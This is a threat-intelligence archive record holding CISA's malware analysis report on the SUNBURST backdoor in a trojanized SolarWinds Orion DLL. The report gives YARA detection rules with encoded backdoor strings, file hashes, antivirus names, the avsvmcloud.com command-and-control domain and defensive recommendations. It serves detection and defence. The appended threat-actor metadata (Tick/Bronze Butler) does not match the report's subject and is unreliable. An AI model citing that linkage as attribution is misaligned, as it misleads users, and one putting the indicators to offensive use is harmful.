MD5_2 = \"846e27a652a5e1bfbd0ddd38a16dc865\"\r\n       SHA256_2 = \"ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\"\r\n   strings:\r\n       $s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 }\r\n       $s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 }\r\n       $s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41\r\n00 41 00 3D 00 3D }\r\n       $s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B\r\n00 53 00 79 00 30 00 42 }\r\n   condition:\r\nall of them\r\n}\r\nrule FireEye_20_00025668_01 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions.\r\nThe first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver\r\nnames/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set\r\nand create registry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\n   strings:\r\n       $cmd_regex_encoded = \"U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA\" wide\r\n       $cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D\r\n66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }\r\n       $fake_orion_event_encoded = \"U3ItS80rCaksSFWyUvIvyszPU9IBAA==\" wide\r\n       $fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }\r\n       $fake_orion_eventmanager_encoded = \"U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==\" wide\r\n       $fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67\r\n65 72 22 2C }\r\n       $fake_orion_message_encoded = \"U/JNLS5OTE9VslKqNqhVAgA=\" wide\r\n       $fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }\r\n       $fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }\r\n   condition:\r\n       $fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or\r\n$fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and\r\n($fake_orion_message_encoded and $fake_orion_message_plain) )\r\n}\r\nrule FireEye_20_00025668_02 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 23 of 30\n\ncommunications. This rule is looking for each branch of the code that checks for which HTTP method is being used.\r\nThis is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally\r\ndesigned so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion.\r\nSUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create\r\nregistry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\n   strings:\r\n       $a = \"0y3Kzy8BAA==\" wide\r\n       $aa = \"S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA\" wide\r\n       $ab = \"S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=\" wide\r\n       $ac = \"C88sSs1JLS4GAA==\" wide\r\n       $ad = \"C/UEAA==\" wide\r\n       $ae = \"C89MSU8tKQYA\" wide\r\n       $af = \"8wvwBQA=\" wide\r\n       $ag = \"cyzIz8nJBwA=\" wide\r\n       $ah = \"c87JL03xzc/LLMkvysxLBwA=\" wide\r\n       $ai = \"88tPSS0GAA==\" wide\r\n       $aj = \"C8vPKc1NLQYA\" wide\r\n       $ak = \"88wrSS1KS0xOLQYA\" wide\r\n       $al = \"c87PLcjPS80rKQYA\" wide\r\n       $am = \"Ky7PLNAvLUjRBwA=\" wide\r\n       $an = \"06vIzQEA\" wide\r\n       $b = \"0y3NyyxLLSpOzIlPTgQA\" wide\r\n       $c = \"001OBAA=\" wide\r\n       $d = \"0y0oysxNLKqMT04EAA==\" wide\r\n       $e = \"0y3JzE0tLknMLQAA\" wide\r\n       $f = \"003PyU9KzAEA\" wide\r\n       $h = \"0y1OTS4tSk1OBAA=\" wide\r\n       $i = \"K8jO1E8uytGvNqitNqytNqrVA/IA\" wide\r\n       $j = \"c8rPSQEA\" wide\r\n       $k = \"c8rPSfEsSczJTAYA\" wide\r\n       $l = \"c60oKUp0ys9JAQA=\" wide\r\n       $m = \"c60oKUp0ys9J8SxJzMlMBgA=\" wide\r\n       $n = \"8yxJzMlMBgA=\" wide\r\n       $o = \"88lMzygBAA==\" wide\r\n       $p = \"88lMzyjxLEnMyUwGAA==\" wide\r\n       $q = \"C0pNL81JLAIA\" wide\r\n       $r = \"C07NzXTKz0kBAA==\" wide\r\n       $s = \"C07NzXTKz0nxLEnMyUwGAA==\" wide\r\n       $t = \"yy9IzStOzCsGAA==\" wide\r\n       $u = \"y8svyQcA\" wide\r\n       $v = \"SytKTU3LzysBAA==\" wide\r\n       $w = \"C84vLUpOdc5PSQ0oygcA\" wide\r\n       $x = \"C84vLUpODU4tykwLKMoHAA==\" wide\r\n       $y = \"C84vLUpO9UjMC07MKwYA\" wide\r\n       $z = \"C84vLUpO9UjMC04tykwDAA==\" wide\r\n   condition:\r\n       ($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q\r\nand $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad\r\nand $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an))\r\n}\r\nssdeep Matches\r\n94 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134\r\nPE Metadata\r\nCompile Date 2020-05-11 17:32:40-04:00\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 24 of 30\n\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name SolarWinds Worldwide, LLC.\r\nFile Description SolarWinds.Orion.Core.BusinessLayer\r\nInternal Name SolarWinds.Orion.Core.BusinessLayer.dll\r\nLegal Copyright Copyright © 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved.\r\nOriginal Filename SolarWinds.Orion.Core.BusinessLayer.dll\r\nProduct Name SolarWinds.Orion.Core.BusinessLayer\r\nProduct Version 2020.2.5300.12432\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n87b3389568887539d8c12033e01bcbda header 512 2.901277\r\n58ca620058a1e26cda220dcb83f4eb26 .text 1018368 5.567638\r\n1d816f4a16b05559313aa30a0d3532d6 .rsrc 1536 3.008439\r\n0db83a842dbb0bb3396691d4238bd216 .reloc 512 0.101910\r\nDescription\r\nThis file has been identified as a SolarWinds Application module containing a patched in SUNBURST backdoor. This\r\nembedded SUNBURST code contains the same functions as \"SolarWinds.Orion.Core.BusinessLayer.dll\"\r\n(32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77), and is signed with the same digital\r\ncertificate.\r\n019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134\r\nTags\r\nbackdoortrojan\r\nDetails\r\nName SolarWinds.Orion.Core.BusinessLayer.dll\r\nSize 1028072 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 2c4a910a1299cdae2a4e55988a2f102e\r\nSHA1 2f1a5a7411d015d01aaee4535835400191645023\r\nSHA256 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134\r\nSHA512 5cbfefe612a40c8872a0faf3db8d3835dc514fb3df159610095b47c595c6caa1ada79cce2b10fb99e648990c3f54f63344d1fa7025090bfcd4e\r\nssdeep 12288:dJKoHwfn/jz3bbO4Qag2I97PMieSLezPKT+cYvjenWHuhh9c0g8vkzE19Wv:rEfDbO97P8TrKhYbenWH4c0g8vkzE19e\r\nEntropy 5.579997\r\nAntivirus\r\nAhnlab Backdoor/Win32.SunBurst\r\nAntiy Trojan[Backdoor]/MSIL.Agent\r\nAvira TR/Sunburst.AH\r\nBitDefender Trojan.Sunburst.A\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 25 of 30\n\nClamav Win.Countermeasure.Sunburst-9809152-0\r\nComodo Backdoor\r\nCyren W32/Trojan.QTKK-7476\r\nESET a variant of MSIL/SunBurst.A trojan\r\nEmsisoft Trojan.Win32.Sunburst (A)\r\nIkarus Backdoor.Sunburst\r\nK7 Trojan ( 00574a531 )\r\nLavasoft Trojan.Sunburst.A\r\nMcAfee Trojan-sunburst\r\nMicrosoft Security Essentials Trojan:MSIL/Solorigate.BR!dha\r\nNANOAV Trojan.Win32.SunBurst.iduxfm\r\nNetGate Trojan.Win32.Malware\r\nSophos Mal/Sunburst-A\r\nSymantec Backdoor.Sunburst\r\nSystweak trojan-backdoor.sunburst-r\r\nTrendMicro Backdoo.6F8C6A1E\r\nTrendMicro House Call Backdoo.6F8C6A1E\r\nVirusBlokAda TScope.Trojan.MSIL\r\nZillya! Trojan.SunBurst.Win32.1\r\nYARA Rules\r\nrule CISA_10318927_01 : trojan rat SOLAR_FIRE\r\n{\r\n   meta:\r\n       Author = \"CISA Code \u0026 Media Analysis\"\r\n       Incident = \"10318927\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_2145\"\r\n       Actor = \"n/a\"\r\n       Category = \"TROJAN RAT\"\r\n       Family = \"SOLAR_FIRE\"\r\n       Description = \"This signature is based off of unique strings embedded within the modified Solar Winds app\"\r\n       MD5_1 = \"b91ce2fa41029f6955bff20079468448\"\r\n       SHA256_1 = \"32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\"\r\n       MD5_2 = \"846e27a652a5e1bfbd0ddd38a16dc865\"\r\n       SHA256_2 = \"ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\"\r\n   strings:\r\n       $s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 }\r\n       $s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 }\r\n       $s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41\r\n00 41 00 3D 00 3D }\r\n       $s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B\r\n00 53 00 79 00 30 00 42 }\r\n   condition:\r\nall of them\r\n}\r\nrule FireEye_20_00025668_01 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 26 of 30\n\nAuthor = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions.\r\nThe first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver\r\nnames/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set\r\nand create registry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\n   strings:\r\n       $cmd_regex_encoded = \"U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA\" wide\r\n       $cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D\r\n66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }\r\n       $fake_orion_event_encoded = \"U3ItS80rCaksSFWyUvIvyszPU9IBAA==\" wide\r\n       $fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }\r\n       $fake_orion_eventmanager_encoded = \"U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==\" wide\r\n       $fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67\r\n65 72 22 2C }\r\n       $fake_orion_message_encoded = \"U/JNLS5OTE9VslKqNqhVAgA=\" wide\r\n       $fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }\r\n       $fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }\r\n   condition:\r\n       $fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or\r\n$fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and\r\n($fake_orion_message_encoded and $fake_orion_message_plain) )\r\n}\r\nrule FireEye_20_00025668_02 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2\r\ncommunications. This rule is looking for each branch of the code that checks for which HTTP method is being used.\r\nThis is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally\r\ndesigned so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion.\r\nSUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create\r\nregistry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\n   strings:\r\n       $a = \"0y3Kzy8BAA==\" wide\r\n       $aa = \"S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA\" wide\r\n       $ab = \"S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=\" wide\r\n       $ac = \"C88sSs1JLS4GAA==\" wide\r\n       $ad = \"C/UEAA==\" wide\r\n       $ae = \"C89MSU8tKQYA\" wide\r\n       $af = \"8wvwBQA=\" wide\r\n       $ag = \"cyzIz8nJBwA=\" wide\r\n       $ah = \"c87JL03xzc/LLMkvysxLBwA=\" wide\r\n       $ai = \"88tPSS0GAA==\" wide\r\n       $aj = \"C8vPKc1NLQYA\" wide\r\n       $ak = \"88wrSS1KS0xOLQYA\" wide\r\n       $al = \"c87PLcjPS80rKQYA\" wide\r\n       $am = \"Ky7PLNAvLUjRBwA=\" wide\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 27 of 30\n\n$an = \"06vIzQEA\" wide\r\n       $b = \"0y3NyyxLLSpOzIlPTgQA\" wide\r\n       $c = \"001OBAA=\" wide\r\n       $d = \"0y0oysxNLKqMT04EAA==\" wide\r\n       $e = \"0y3JzE0tLknMLQAA\" wide\r\n       $f = \"003PyU9KzAEA\" wide\r\n       $h = \"0y1OTS4tSk1OBAA=\" wide\r\n       $i = \"K8jO1E8uytGvNqitNqytNqrVA/IA\" wide\r\n       $j = \"c8rPSQEA\" wide\r\n       $k = \"c8rPSfEsSczJTAYA\" wide\r\n       $l = \"c60oKUp0ys9JAQA=\" wide\r\n       $m = \"c60oKUp0ys9J8SxJzMlMBgA=\" wide\r\n       $n = \"8yxJzMlMBgA=\" wide\r\n       $o = \"88lMzygBAA==\" wide\r\n       $p = \"88lMzyjxLEnMyUwGAA==\" wide\r\n       $q = \"C0pNL81JLAIA\" wide\r\n       $r = \"C07NzXTKz0kBAA==\" wide\r\n       $s = \"C07NzXTKz0nxLEnMyUwGAA==\" wide\r\n       $t = \"yy9IzStOzCsGAA==\" wide\r\n       $u = \"y8svyQcA\" wide\r\n       $v = \"SytKTU3LzysBAA==\" wide\r\n       $w = \"C84vLUpOdc5PSQ0oygcA\" wide\r\n       $x = \"C84vLUpODU4tykwLKMoHAA==\" wide\r\n       $y = \"C84vLUpO9UjMC07MKwYA\" wide\r\n       $z = \"C84vLUpO9UjMC04tykwDAA==\" wide\r\n   condition:\r\n       ($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q\r\nand $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad\r\nand $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an))\r\n}\r\nssdeep Matches\r\n94 ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\r\nPE Metadata\r\nCompile Date 2020-04-21 10:53:33-04:00\r\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name SolarWinds Worldwide, LLC.\r\nFile Description SolarWinds.Orion.Core.BusinessLayer\r\nInternal Name SolarWinds.Orion.Core.BusinessLayer.dll\r\nLegal Copyright Copyright © 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved.\r\nOriginal Filename SolarWinds.Orion.Core.BusinessLayer.dll\r\nProduct Name SolarWinds.Orion.Core.BusinessLayer\r\nProduct Version 2020.2.5200.12394\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n7810cd48d16fb0d3c3a0c855f2d9225a header 512 2.907043\r\nf249efb5d984eb62f325179a721985f3 .text 1018368 5.567580\r\n9aea23ae0750b77218d9a85d4896eb0c .rsrc 1536 3.005835\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 28 of 30\n\nMD5 Name Raw Size Entropy\r\n0db83a842dbb0bb3396691d4238bd216 .reloc 512 0.101910\r\nDescription\r\nThis file has been identified as a SolarWinds Application module containing a patched in SUNBURST backdoor. This\r\nembedded SUNBURST code contains the same functions as \"SolarWinds.Orion.Core.BusinessLayer.dll\"\r\n(32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77), and is signed with the same digital\r\ncertificate.\r\nRelationship Summary\r\n32519b85c0... Connected_To avsvmcloud.com\r\n32519b85c0... Contained_Within d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600\r\navsvmcloud.com Connected_From 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nd0d626deb3... Contains 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nConclusion\r\nPlease refer to the following resources for additional information and mitigation actions related to this campaign:\r\n1) Alert (AA20-352A): Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and\r\nPrivate Sector Organizations\r\nhttps://us-cert.cisa.gov/ncas/alerts/aa20-352a\r\n2) Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise\r\nhttps://cyber.dhs.gov/ed/21-01/\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 29 of 30\n\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or CISA Central .\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nFebruary 8, 2021: Initial Version|April 15, 2021: Updated with Attribution Statement\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 30 of 30",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a"
	],
	"report_names": [
		"ar21-039a"
	],
	"threat_actors": [
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433992,
	"ts_updated_at": 1775826790,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5ffae5b175dbc71065f303731692e314324726cb.pdf",
		"text": "https://archive.orkl.eu/5ffae5b175dbc71065f303731692e314324726cb.txt",
		"img": "https://archive.orkl.eu/5ffae5b175dbc71065f303731692e314324726cb.jpg"
	}
}